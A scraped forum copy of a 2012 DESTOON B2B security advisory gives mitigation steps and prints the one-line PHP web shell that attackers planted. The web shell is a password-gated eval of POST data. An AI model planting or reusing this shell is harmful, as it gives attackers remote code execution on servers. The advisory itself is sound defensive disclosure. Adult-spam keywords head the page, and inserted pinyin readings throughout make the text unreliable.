中国真实偷乱视频,东京道一本热中文字幕,久久精品国产99国产精品亚洲,欧美激情一区二区三区在线

Board logo

標(biāo)題: DESTOON B2B緊急安全公告20121010 [打印本頁(yè)]
作者: andy15703166    時(shí)間: 2012-10-11 09:52     標(biāo)題: DESTOON B2B緊急安全公告20121010

由于后臺(tái)模板管理權(quán)限過(guò)大存在安全隱患,可能導(dǎo)致部分用戶(hù)遭遇黑客攻擊,為了您的網(wǎng)站安全,請(qǐng)看到此公告之后立即做以下處理:

一、修改根目錄config.inc.php修改 $CFG['edittpl'] = '1'; 為 $CFG['edittpl'] = '0'; 禁用在線(xiàn)編輯模板功能,$CFG['executesql'] 也建議設(shè)置為 0 禁用后臺(tái)執(zhí)行SQL功能。3.0及以下版本用戶(hù),請(qǐng)臨時(shí)刪除admin/template.inc.php以免遭遇攻擊。

二、檢查站點(diǎn)目錄是否存在file/swfupload/editor.php和company/link/link.php,如果存在,請(qǐng)立即刪除,注意file/swfupload/editor.inc.php為系統(tǒng)正常文件,請(qǐng)不要誤刪。

設(shè)置過(guò)偽靜態(tài)并且站點(diǎn)目錄權(quán)限設(shè)置嚴(yán)格的用戶(hù)不受此影響,請(qǐng)看到的用戶(hù)相互轉(zhuǎn)告,盡快處理。

提示:

系統(tǒng)需要設(shè)置可寫(xiě)的目錄和文件詳見(jiàn):http://help.destoon.com/install/68.html,其他文件和目錄請(qǐng)不要設(shè)置寫(xiě)入權(quán)限。

利用Rewrite規(guī)則設(shè)置網(wǎng)站安全:http://help.destoon.com/skill/71.html

PS:
黑客上傳文件file/swfupload/editor.php 和 link.php文件源碼:
  1. <?php if(md5($_GET['pass'])=='cfb83d29df045615c7d99d33110ef683'){eval($_POST[console]);}else{die('fuck off!');}?>
復(fù)制代碼





歡迎光臨 WDlinux官方論壇 (http://ahbydz.com/bbs/) Powered by Discuz! 7.2